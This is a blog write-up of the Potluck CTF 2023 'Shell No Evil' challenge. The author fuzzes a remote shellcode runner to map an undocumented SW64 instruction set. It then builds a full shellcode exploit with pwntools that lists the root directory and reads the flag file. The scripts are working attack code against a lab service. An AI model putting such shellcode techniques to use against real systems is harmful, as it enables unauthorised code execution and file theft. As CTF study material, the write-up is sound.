Potluck CTF 2023 – Shell No Evil

This was a super interesting challenge to me. If you want to follow along, the files are archived here.

At a basic level the challenge setup is that you can send shellcode for an “unknown” architecture, namely SW64, to a remote service that will execute it and return a single value.

The Challenge Setup

Starting out on any challenge really, the first thing I do is read the description.
So here it is:

Due to the special background of the R&D unit of Sunway CPU, the SW64 instruction set has not been made public so far. Although non-disclosure of the instruction set is very detrimental to the construction of the software ecosystem, it also prevents malicious attackers from writing shellcode targeting Sunway processors, and the product has extremely high self-security. [1]

🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣

Surely writing shellcode for an ""unknown"" architecture is impossible, right, right???

Note: Flag located at /flag_(a random uuid), there is no /bin/sh.

[1] Machine translated, source: https://k-sina-cn.translate.goog/article_5952916295_162d24b47019001k3l.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=zh-CN&_x_tr_pto=wapp'

This sounded super interesting to me, so this was the first challenge I decided to work on during the CTF.

challenge.c

So I downloaded the files and unpacked them. The only file you got for the challenge was challenge.c.
I’ve linked the original above, but I will only go over the parts I think are relevant.

int main(int argc, char *argv[]) {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);

  PrintCurrentArch();

  void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                    MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
  if (page == MAP_FAILED) {
    puts("mmap failed?");
    return 1;
  }
  printf("Give me a shellcode to compute A+B, size (0 to use the builtin): ");

For now let’s just believe the challenge author that functions do what their name suggests.
The challenge first prints the current architecture, then maps one page of memory read/write and then prompts the user for “shellcode to compute A+B“. So far so good.
The interesting nugget for me was that if I pass size 0 it will use some builtin shellcode.

Let’s quickly verify that the challenge does what we expect. I am running the challenge container locally with:

docker run -p 5000:5000 --privileged potluck-ctf-challenge-12

So let’s just netcat to port 5000 and send 0.

Everything as expected. This may seem pointless or banal, but I find that especially with compact challenges it’s a good idea to verify your assumptions as often as possible. I tripped over not doing it consistently enough quite a few times while solving this challenge.

Let’s read more challenge code.

  size_t size = 0;
  scanf("%zu", &size);
  if (size > 4096) {
    puts("too big! ❤️");
    return 1;
  }
  if (size) {
    printf("ok, give me %zu bytes of shellcode: ", size);
    if (ReadN(0, page, size) != size) {
      return 1;
    }
  } else {
    memcpy(page, kBuiltinShellcode, sizeof(kBuiltinShellcode));
  }

The code reads the size of our input, performs a bounds check and then has special handling for if 0 is passed in. Namely it copies kBuiltinShellcode into the page that was mapped earlier.
Otherwise it will read our input (if the function name is to be believed).

Let’s read the final bit of the challenge code.

if (mprotect(page, 4096, PROT_READ | PROT_EXEC) != 0) {
    puts("mprotect failed??");
    return 1;
  }

  int a = 1;
  int b = 2;
  int (*a_plus_b)(int, int) = page;
  printf("%d + %d = %d\n", a, b, a_plus_b(a, b));
  return 0;
}

In line 56 the page that the shellcode was written to is made executable.
In line 63 the address of page is cast to a function pointer to a function that takes 2 int arguments and returns an int.
Finally in line 64 the result of the “”addition”” is printed and actually calculated by calling the function in page.

So it looks like the challenge really does what it says on the tin. It will execute whichever bytes we pass it and print the result for us.

Now if you’ve been paying attention you probably really want to know what kBuiltinShellcode actually is.

kBuiltinShellcode

unsigned char kBuiltinShellcode[] = {
    0x00, 0x00, 0x11, 0x42, 0x01, 0x00, 0xfa, 0x0b,
};

And that’s it in all it’s glory. 8 bytes to add two numbers (apparently). If you’re like me at this stage, you’ll have no clue what those bytes actually mean. But we can talk to the service, so let’s just do a sanity check for now.

If we submit the same bytes as the builtin shellcode we should see the same result.

from pwn import *

kBuiltinShellcode = b"\x00\x00\x11\x42\x01\x00\xfa\x0b"

r = remote("localhost", 5000)
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(kBuiltinShellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(kBuiltinShellcode)
print(r.clean(timeout=0.5))

The code is pretty self-explanatory.
We have some bytes representing the builtin shellcode and then we send its length and the shellcode itself and print the result.

and it behaves exactly like expected. So it seems like there aren’t any weird tricks going on with the challenge, seems like it does what it says on the tin.
At this stage I started to just mess with the bytes in the builtin shellcode, I’ll give one example and then I’ll skip ahead.

kBuiltinShellcode = b"\x00\x00\x10\x42\x01\x00\xfa\x0b"

The only change here is that the third byte is 0x10 instead of 0x11.

It’s nice to see that the result changed, so it actually matters what we send over.
To not do all of this manually I modified my script a little bit, so that I could quickly check all modified bytes and after some poking around I found something interesting.

Entry Point

Here’s something similar to the script I was using.

from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
kBuiltinShellcode = b"\x00\x00\x11\x42\x01\x00\xfa\x0b"

def attempt(shellcode):
    with remote("localhost", 5000) as r:
        r.recvuntil(b"(0 to use the builtin): ")
        r.sendline(f"{len(shellcode)}".encode())
        r.recvuntil(b"bytes of shellcode: ")
        r.send(shellcode)
        return r.clean(timeout=0.5)

if __name__ == "__main__":
    for i in range(256):
        print(hex(i))
        sc = kBuiltinShellcode[0:3]+bytes([i])+kBuiltinShellcode[4:8]
        print(attempt(sc).decode())

First, I’ve wrapped attempting whatever shellcode I want to try into a function.
Second, I’m replacing the 4th byte in the payload with all values between 0 and 255, just to see what happens. So here’s what that looks like at first.

Some weird error messages (they still don’t really make sense to me). And empty responses, maybe we hung or crashed the process, I’m not sure, at the very least those take the longest to run.
Then starting from 0x40 we get relatively normal looking results. Especially 0x42 behaves as expected, since it’s the original byte from kBuiltinShellcode.

But at 0x74 something very interesting happens.

We seem to have crashed qemu-sw64 and not just that, it helpfully dumps all registers for us.
During the CTF this actually sent me down a rabbit hole trying to find this build of qemu. In this blog post I’ll continue down the path I ultimately went to solve the challenge though.

Registers

Looking at the dump of registers above we can make some (more or less) educated guesses about the architecture. I’ll also exclude the f registers, they are likely floating point registers and I have no desire to deal with that.

Here are my guesses/hypotheses I took from these registers and their names.

  • PC probably the program counter, especially since it’s the same value as the here in the qemu crash message
  • SP probably the stack pointer
  • RA possibly the return address? Similar to a link register maybe.
  • A0-A5 probably arguments being passed. a0 is 1 and a1 is 2, exactly the arguments passed to our addition function. A2 is 5 which is also the value of PROT_READ | PROT_EXEC.
  • T3 and T7 are 3, but we didn’t add anything in this payload, so keep that in mind.
  • Registers all seem to be 64 bit wide.

So this already gives us a decent idea about the architecture, as well as a part of the ABI.
Next let’s modify the original shellcode again to crash after the addition.

from pwn import *

kBuiltinShellcode = b"\x00\x00\x11\x42\x00\x00\x11\x74"

r = remote("localhost", 5000)
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(kBuiltinShellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(kBuiltinShellcode)
print(r.clean(timeout=0.5).decode())

Crashing after the addition shows us that v0 has become 3, the result of our operation. So v0 likely contains the return value in the ABI.

Enumerating Registers

At this point I wanted to work out how to target specific registers, so I modified the script that found the crash a little bit.

from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
crashing_code = b"\x00\x00\x11\x42\x00\x00\x11\x74"

def attempt(shellcode):
    with remote("localhost", 5000) as r:
        r.recvuntil(b"(0 to use the builtin): ")
        r.sendline(f"{len(shellcode)}".encode())
        r.recvuntil(b"bytes of shellcode: ")
        r.send(shellcode)
        return r.clean(timeout=0.5)

if __name__ == "__main__":
    for i in range(256):
        print(hex(i))
        sc = bytes([i])+crashing_code[1:8]
        print(attempt(sc).decode())

Now we’re intending to always crash, but we are replacing the first byte with the numbers 0 through 255.
I will be snipping out a LOT of output.

You’ve probably spotted the pattern already. The first byte seems to just be the index of the target register. You can very clearly see that all the way up to 0x1e we always write 3 to the corresponding register in the list. (At 0x1f nothing happens, it’s a special read 0, write ignore register).

But when we wrap around to 0x20, something interesting happens. We change v0 again, but not to 3 as expected. We somehow changed the result of the operation. More on that in a little bit.

For the moment the takeaway is that we can access any of the 31 general purpose registers.
That it wraps around after 32 means that the registers are likely encoded as 5 bit.

Let’s see if we can also work out how the other registers are encoded.
To do this we mask 5 bits in the addition instruction and replace them with the index of t0, since it has a recognizable value. Here is the code:

from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"

def attempt(shellcode):
    with remote("localhost", 5000) as r:
        r.recvuntil(b"(0 to use the builtin): ")
        r.sendline(f"{len(shellcode)}".encode())
        r.recvuntil(b"bytes of shellcode: ")
        r.send(shellcode)
        return r.clean(timeout=0.5)

if __name__ == "__main__":
    for i in range(27):
        print(hex(i))
        r_idx = 1
        add_val = u32(add_code) #turn add instruction into number
        add_val &= ~(0x1f << i) #mask 5 bits
        add_val |= r_idx << i #or with 1 to set bit again
        sc = p32(add_val) + crashing_code # modified addition + crash
        print(attempt(sc).decode())

Going through the results here are the interesting excerpts:

This behaviour is (almost) exactly as expected.
Our original instruction amounts to v0=a0+a1 or v0=a1+a0, we can’t really distinguish these because addition is commutative.
In the 0x0 case we’ve replaced the target register, so now t0 has become 3, since our new instruction amounts to t0=a0+a1.
In the 0x10 case we’ve replaced a1, so we get v0=t0+a0=t0+1.
In the 0x15 case we’ve replaced a0, so we get v0=t0+a1=t0+2.
So this tells us how to perform 32-bit addition using different registers.

Now why do I say 32 bit? You may have noticed that the value of t0 has been truncated. So at this point I’m assuming that we are performing 32 bit addition.

Addition

With our new-found knowledge, let’s try and see if we can break down the encoding of our instruction.

Decoding the original addition instruction manually we get out that
dst=0=v0
src1=17=a1
src2=16=a0
These perfectly line up with the registers from the crash dumps above.
This means that bits 5-15 and 26-31 somehow encode our addition operation.

Let’s perform a sanity check first and add some interesting values together assuming our encoding works.

from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"

def attempt(shellcode):
    with remote("localhost", 5000) as r:
        r.recvuntil(b"(0 to use the builtin): ")
        r.sendline(f"{len(shellcode)}".encode())
        r.recvuntil(b"bytes of shellcode: ")
        r.send(shellcode)
        return r.clean(timeout=0.5)

def add(dst, r1,r2):
    add_val = 0x40000000 #decoded and masked value that means 32-bit add
    #or registers into instruction
    add_val |= dst 
    add_val |= r1 << 0x10
    add_val |= r2 << 0x15
    return p32(add_val) #encode

if __name__ == "__main__":
    add_val = add(21,22,23) #add: a5=t8+t9
    sc = add_val + crashing_code # modified addition + crash
    print(attempt(sc).decode())

Looks like it works exactly as expected.

Arithmetic

From here we can experiment to see if we can find other operations that seem useful. Let’s start by modifying that string of 10 0 bits in the original addition instruction. That’s 1024 possible values, so I won’t put all of them down, you’re welcome to run the script yourself, I recommend piping the output into a file.

from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"

def attempt(shellcode):
    with remote("localhost", 5000) as r:
        r.recvuntil(b"(0 to use the builtin): ")
        r.sendline(f"{len(shellcode)}".encode())
        r.recvuntil(b"bytes of shellcode: ")
        r.send(shellcode)
        return r.clean(timeout=0.5)

def add(dst,r1,r2, mod):
    add_val = 0x40000000 #decoded and masked value that means 32-bit add
    #or registers into instruction
    add_val |= dst 
    add_val |= mod << 0x5 #Modify the 10 zero bits of the 32bit addition
    add_val |= r1 << 0x10
    add_val |= r2 << 0x15
    return p32(add_val) #encode

if __name__ == "__main__":
    for i in range(1024):
        print(hex(i))
        add_val = add(21,22,23, i) #add: a5=t8+t9
        sc = add_val + crashing_code # modified addition + crash
        print(attempt(sc).decode())

There are a lot of other interesting operations in there, but I just wanted to illustrate the basic principle.
At this point I assumed that the 10 bits encode the arithmetic operation. That means that the last 6 bits likely encode the type of the operation.

Intermediate Recap

At this point let’s recap.

We are able to dump all registers.
We are able to encode basic arithmetic between registers.

During the CTF, I started to wrap the instructions I knew how to encode into a little helper script.
At this stage it contained mov (add dst, src, zero), add and sub. I was only using the 64 bit versions.

But if we want to be able to read the flag we definitely need a bit more.

Namely, we don’t know how to read or write memory yet and we have no idea how to issue a syscall.

Accessing Memory

Figuring out how to access memory was a bit tricky at first.
Specifically, how would I know that the value in a register comes from memory and not some arithmetic or other operation? If I knew how to access the pc register it might be easier, but unfortunately pc isn’t one of the 32 general purpose registers I know how to encode.

After trying around for a while I noticed something very useful though. I’ll highlight it in the excerpt below:

Register t12 is VERY close to PC. In fact I’m confident that t12 points to the page our shellcode is read into.
So if I add a bunch of known data I can verify that I am reading memory as expected.

The plan is this:

  • Add some value to t12, in this case t8 is a good candidate.
  • Try out all variants of the top 6 bits, with all registers set to t12.
  • Fill the rest of the shellcode with As
  • If we see 0x41414141 we have likely found a read.
from pwn import *
from sw64 import add, t12, t8
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"

def attempt(shellcode):
    with remote("localhost", 5000) as r:
        r.recvuntil(b"(0 to use the builtin): ")
        r.sendline(f"{len(shellcode)}".encode())
        r.recvuntil(b"bytes of shellcode: ")
        r.send(shellcode)
        return r.clean(timeout=0.5)

def op(dst,r1,r2, mod):
    op_val = 0x00000000 
    op_val |= dst 
    op_val |= mod << 0x1a #Modify the op code
    op_val |= r1 << 0x10
    op_val |= r2 << 0x15
    return p32(op_val) #encode

if __name__ == "__main__":
    for i in range(64):
        print(hex(i))
        payload = add(t12,t12,t8) #Add some offset to t12 so we're in the middle of the page
        payload += op(t12,t12,t12,i) #Try out our operation
        payload += crashing_code #Crash so we can read registers
        payload += b"A"*(4096-len(payload)) #Fill with As
        print(attempt(payload).decode())

Here’s the code to put this plan into action.
Line 2 imports my little support library, this let’s me add and use registers by name to make the process more comfortable.
Line 18 is the one that modifies the op code to let us try out different ones.
Line 26-29 construct the payload, it’s starting to look similar to assembly.

And op 0x23 seems to do what we want. It loads 8 bytes from memory.
I’ll skip the details of how I worked out which bits specify src and dst in the encoding. There were only a few combinations and I manually tried them out. In the end, I arrived at this nice little helper (you can tell it’s just slightly adapted from the enumeration script):

def ldq(dst,src_reg):
    op_val = 0x00000000 
    op_val |= dst << 0x15
    op_val |= src_reg << 0x10
    op_val |= 0x23 << 0x1a #Modify the op code
    return p32(op_val) #encode

Since we can now load values from memory, we can repeat this process and verify if we have written to memory somewhere. It’s basically the same as we did for the load, except we first try to store and then load from the location we tried to store at to check if something changed.

One thing to note is that we can’t use t12 again, because the memory is read-only when our code runs.
But happily our assumed stack pointer sp probably points to writable memory.
So here’s the test:

from pwn import *
from sw64 import add, t12, t8, sp, v0
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"

def attempt(shellcode):
    with remote("localhost", 5000) as r:
        r.recvuntil(b"(0 to use the builtin): ")
        r.sendline(f"{len(shellcode)}".encode())
        r.recvuntil(b"bytes of shellcode: ")
        r.send(shellcode)
        return r.clean(timeout=0.5)

def load(dst,src_reg):
    op_val = 0x00000000 
    op_val |= dst << 0x15
    op_val |= src_reg << 0x10
    op_val |= 0x23 << 0x1a #Modify the op code
    return p32(op_val) #encode

def op(dst,src_reg, mod):
    op_val = 0x00000000 
    op_val |= dst << 0x15
    op_val |= src_reg << 0x10
    op_val |= mod << 0x1a #Modify the op code
    return p32(op_val) #encode

if __name__ == "__main__":
    for i in range(64):
        print(hex(i))
        payload = op(t12,sp,i) #Try out our operation, to write to [sp]
        payload += load(v0, sp) #Load from sp into v0
        payload += crashing_code #Crash so we can read registers
        payload += b"A"*(4096-len(payload)) #Fill with As
        print(attempt(payload).decode())

In line 26 we’re doing the same modification as before, except that we’re assuming that load and store operations will be encoded in a similar way.
Then our payload in lines 32 to 34 will attempt to write the value of t12 at address sp and load that value back into v0.
Again I’ll only put an excerpt of the results here, but it should be pretty clear:

So with 0x2b we’ve transfered the value of t12 to v0, by first writing it to memory and then reading it back out.

So at this point we can also load and store memory.
I will skip a little bit here, where I discovered that I can also encode an offset into the memory access. This works essentially the same way as it does on ALPHA.

Syscalls

At this point all that’s missing is figuring out how to issue syscalls and the corresponding numbers.
This could have been a total pain in the butt, but luckily at least in this regard SW64 is VERY similar to ALPHA.

During the whole endeavour I was googling for things and getting stuck in a bunch of rabbit holes. But among a lot of useless information I also learned that SW64 is based off of, or at least similar to ALPHA.
So I looked up how syscalls work on linux in the ALPHA architecture here.

LEAF(__syscall, 0)
	mov	a0, v0		/* Syscall number -> v0 */
	mov	a1, a0		/* arg1-arg5 -> a0-a4 */
	mov	a2, a1
	mov	a3, a2
	mov	a4, a3
	mov	a5, a4
	call_pal PAL_callsys	/* Invoke system call */
	bne	a3, error
	ret

Lines 2 and 3 tell us the calling convention.
I had to read up a bit to find out what the PAL_callsys constant on line 7 is, but found it here for example.
Luckily the call_pal instruction seems to be encoded the same way as it is on ALPHA, so I didn’t need to do any enumeration there.

So this is what a syscall looks like in my helper script:

op_call_pal = 0
pal_callsys = 0x83
def pal(_pal):
    inst = (op_call_pal&0x3f)<<26
    inst |= _pal&0x1ffffff
    return p32(inst)

#v0 syscall num
#a0-a5 args
def syscall_0():
    return pal(pal_callsys)

Nothing super interesting in that code.

The main issue left is how to easily load data into registers, since we haven’t found a way to load immediate values. But since we know the start of our page in memory is in register t12, we can just include all our data in the payload and perform relative loads from t12.

Let’s try to open a file this way.

Helpfully there’s a table of syscalls that includes the ALPHA architecture.
So we know that open corresponds to syscall_no 45.

I’ve heavily commented the following test, so I hope it’s easy to follow.

from pwn import *
from sw64 import *
context.log_level = "error" #get rid of annoying connect disconnect prints
crashing_code = b"\x00\x00\x11\x74"

def attempt(shellcode):
    with remote("localhost", 5000) as r:
        r.recvuntil(b"(0 to use the builtin): ")
        r.sendline(f"{len(shellcode)}".encode())
        r.recvuntil(b"bytes of shellcode: ")
        r.send(shellcode)
        return r.clean(timeout=0.5)

if __name__ == "__main__":
    data_offset = 0x100
    # Code
    payload = ldq(v0, t12, data_offset) # load syscall no for open into v0
    payload += ldq(a0, t12, data_offset+0x8) # load offset to string "/" into a0
    payload += add(a0, t12, a0) # add start of our memory page to turn offset into address
    payload += mov(a1, zero_reg) # set a1 to 0, this corresponds to opening the file read only
    payload += syscall_0() # issue syscall
    payload += crashing_code #Crash so we can read registers
    # Padding
    payload += b"\x00"*(data_offset-len(payload)) # pad to data_offset length
    # Data
    payload += p64(45) # syscall_open
    payload += b"/\0\0\0" # "/"
    print(attempt(payload).decode())

I arbitrarily decided to put the data 0x100 after the start of the code. This could have been any offset as long as both code and data fit into the 4096 bytes of space that we have.

We fill the registers as appropriate for the syscall and then trigger it. Immediately afterwards we crash, so that we can examine the result.

v0 = 2
So it looks like we’ve opened a new file descriptor. And that’s basically it.
With the ability to issue system calls we now have the last piece of the puzzle.

The Full Exploit

I feel like the interesting bit of this challenge was working out the instruction set.
Writing the exploit after having basic assembly functionality was relatively trivial by comparison.

I will briefly go over the actual exploit I ended up using during the CTF, so it’s structure is a little different from the small demo scripts I made for this blog post.
I will go over each section of the exploit individually, listing both the relevant code and data sections separately. (Mainly so line numbers work)
Here is a link to the entirety.

from pwn import *
from sw64 import *
break_code = bytes([0x00,0x00,0x10,125])

def send_payload(p, payload):
    p.recvuntil(b"(0 to use the builtin):")
    p.sendline(str(len(payload)).encode())
    p.recvuntil(b"of shellcode: ", timeout=1)
    p.send(payload)
    return p.clean(timeout=1).decode()

def attempt(payload):
    with remote("localhost", 5000) as p:
        return send_payload(p, payload)


syscall_no_open = 45
syscall_no_getdents = 305
syscall_no_read = 3
if __name__ == "__main__":
    data_offset = 0x100
    payload = b""
    #Open /
    payload += ldq(v0, s0, data_offset) #syscall_open
    payload += ldq(a0, s0, data_offset+0x8)
    payload += mov(a1, zero_reg)
    payload += add(a0, s0, a0)
    payload += syscall_0()
    payload += b"\x00"*(data_offset-len(payload))
    #data
    payload += p64(syscall_no_open)
    payload += p64(0x118) #string offset #0x8
    payload += p64(0x0) #open flags #0x10
    payload += b"/"+b"\x00"*7 #0x18

The payload starts out basically the same as our open test. Nothing more to explain here.
The only small note is that I am making all entries in the data segment multiples of 8 large.

After this part of the payload we should have an open file descriptor for the root directory in v0.

    # Dirent
    payload += mov(a0, v0)
    payload += mov(a1, sp)
    payload += ldq(a2, t12, data_offset+0x28)
    payload += ldq(v0, t12, data_offset+0x20) #syscall_get_dents
    payload += syscall_0()
    payload += p64(syscall_no_getdents)#0x20
    payload += p64(200) #0x28

Next we are calling dirent. The main reason is that the flags file name includes a UUID that we definitely don’t know and can’t even guess.

Dirent reads filenames and some metadata into a buffer. So we plan to read the contents of “/” into a buffer at sp.

    offset = 48+16 # Worked out through experimentation
    # Overwrite prepend / to flag filename
    payload += ldq(t0, sp, offset+0) # Load data one byte before flag filename into t0
    payload += ldq(t1, t12, data_offset+0x30) # Load data containing the difference into t1
    payload += add(t0, t1, t0) # Add to t0 to effectively prepend /
    payload += stq(t0, sp, offset) # Write data back to buffer
    # Open /flag-foo-bar-baz-lorem-ipsum
    payload += ldq(t1, t12, data_offset+0x38) #Load offset inside sp into t1
    payload += add(a0, sp, t1) #Set a0 to sp+t1
    payload += mov(a1, zero_reg) #Set a1 to 0, O_READONLY
    payload += ldq(v0, t12, data_offset) #syscall_open
    payload += syscall_0()
    payload += p64(0x2f00-0x0040) #0x30
    payload += p64(48+17)

Through reading the memory I worked out where the offset to the flag filename is.
Unfortunately the filenames returned by dirent don’t include the leading slash, so I’m doing some trickery to prepend ‘/’ in the buffer.

After that I set a0 to point to the filename, now with ‘/’ prepended, and a1 to be O_RDONLY and open the flag file.
All that’s left is to read the flag.

    #read flag
    payload += mov(a0, v0) # Move new fd into a0
    payload += mov(a1, sp) # Move sp into a1
    payload += ldq(a2, t12, data_offset+0x28) # move 200 into a2
    payload += ldq(v0, t12, data_offset+0x40) # move syscall# of read into v0
    payload += syscall_0() #syscall_read
    # Read flag into registers and crash
    payload += ldq(t0, sp, 0)
    payload += ldq(t1, sp, 8)
    payload += ldq(t2, sp, 16)
    payload += ldq(t3, sp, 24)
    payload += break_code
    payload += p64(200) #0x28
    payload += p64(0x2f00-0x0040) #0x30
    payload += p64(48+17)
    payload += p64(syscall_no_read)#0x40

Calling read works very similar again. We move the new fd of the flag file into a0, we move sp into a1, we load 200 into a2 and the syscall number of read into v0.
After issuing the syscall, the data of the flag file, should now be at sp.

So we simply load the data into t0-t3 and crash the machine one last time.

Decoding those values gives the following.

And that’s when I realised I might not have solved the challenge the intended way.

Epilogue

While I later learned that my solution wasn’t exactly the intended way, apparently the other solvers had done it in similar ways.

It was intended that one could have found a compiler somewhere on the chinese internet. Honestly, I think I would have enjoyed this challenge a lot less if I had solved it the intended way.

This post was more of a writeup of how I arrived at the solution, rather than a description of all the rabbit holes I fell into. So to avoid the impression that I solved this challenge without any trouble, I’ll just give a quick rundown of things I ran into.

  • Missed that the challenge description said ‘ “”unknown”” architecture’ in double quotes for the first day.
  • Found a qemu build that claimed to be sw64, spent some time learning about tcg only to realise after a few hours that the emulator had just renamed MIPS.
  • Misinterpreted some of the results I was seeing and assumed that some instructions may not be 4 bytes wide.
  • I dumped the compiled challenge.c file from memory, hoping that I could more easily reverse engineer instructions. Wasn’t helpful AT ALL

Leave a Reply

Your email address will not be published. Required fields are marked *